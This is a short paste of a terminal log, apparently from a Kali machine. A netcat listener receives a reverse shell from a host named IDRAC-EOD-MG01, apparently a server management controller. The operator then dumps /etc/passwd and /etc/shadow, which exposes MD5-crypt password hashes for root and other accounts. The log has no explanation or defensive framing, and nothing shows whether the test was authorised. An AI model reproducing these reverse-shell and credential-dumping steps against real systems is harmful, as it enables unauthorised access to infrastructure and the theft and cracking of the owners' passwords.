Untitled

 avatar
unknown
plain_text
10 months ago
800 B
4
Indexable
──(kali㉿kali)-[~]
└─$ nc -v -l -p 5500
listening on [any] 5500 ...
192.168.88.252: inverse host lookup failed: Unknown host
connect to [192.168.88.143] from (UNKNOWN) [192.168.88.252] 60153
hostname
IDRAC-EOD-MG01
less /etc/passwd
root:x:0:0:root:/:/bin/sh
user1:x:500:500:Linux User,,,:/:/bin/sh
racuser:x:1000:500:Linux User,,,:/tmp:/usr/bin/clpd
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/bin/false
avahi:x:1001:1001:Linux User,,,:/home/avahi:/bin/sh
messagebus:x:999:997::/var/lib/dbus:/bin/false
cat /etc/shadow
root:$1$fY6DG6Hu$OpwCBE01ILIS1H/Lxq/7d0:13502:0:99999:7:::
user1:$1$nVOr80rB$HDAd6FRlG24k/WN4ZuYPC0:0:0:99999:7:::
racuser:!:0:0:99999:7:::
sshd:*:11880:0:99999:7:-1:-1:0
avahi:$1$pJYNhpn.$wAkwuB4v7suGj4h60uD6j0:16328:0:99999:7:::
messagebus:!:15873:0:99999:7:::
Editor is loading...
Leave a Comment